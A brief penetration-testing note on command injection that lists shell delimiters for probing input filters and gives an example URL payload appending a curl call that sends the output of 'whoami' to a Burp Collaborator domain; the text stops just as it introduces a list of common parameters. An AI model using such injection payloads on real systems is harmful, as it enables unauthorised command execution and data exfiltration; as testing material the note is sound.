We can inject some special characters to see if the application blocks anything that could be used for command injection: - & - ; - Newline (0x0a or \n) - && - | - ||
In case the application doesn’t throw any error messages, we can try injecting our command after using one of these delimiters.
Observe that the parameter parses the command you inject http://targetsite?id=blahblah;curl+$(whoami).xxxxx.burpcollaborator.net/
Note: This is a broad concept, above payload is just an example
The most common parameters that can be consider while testing for Command injection can be found below: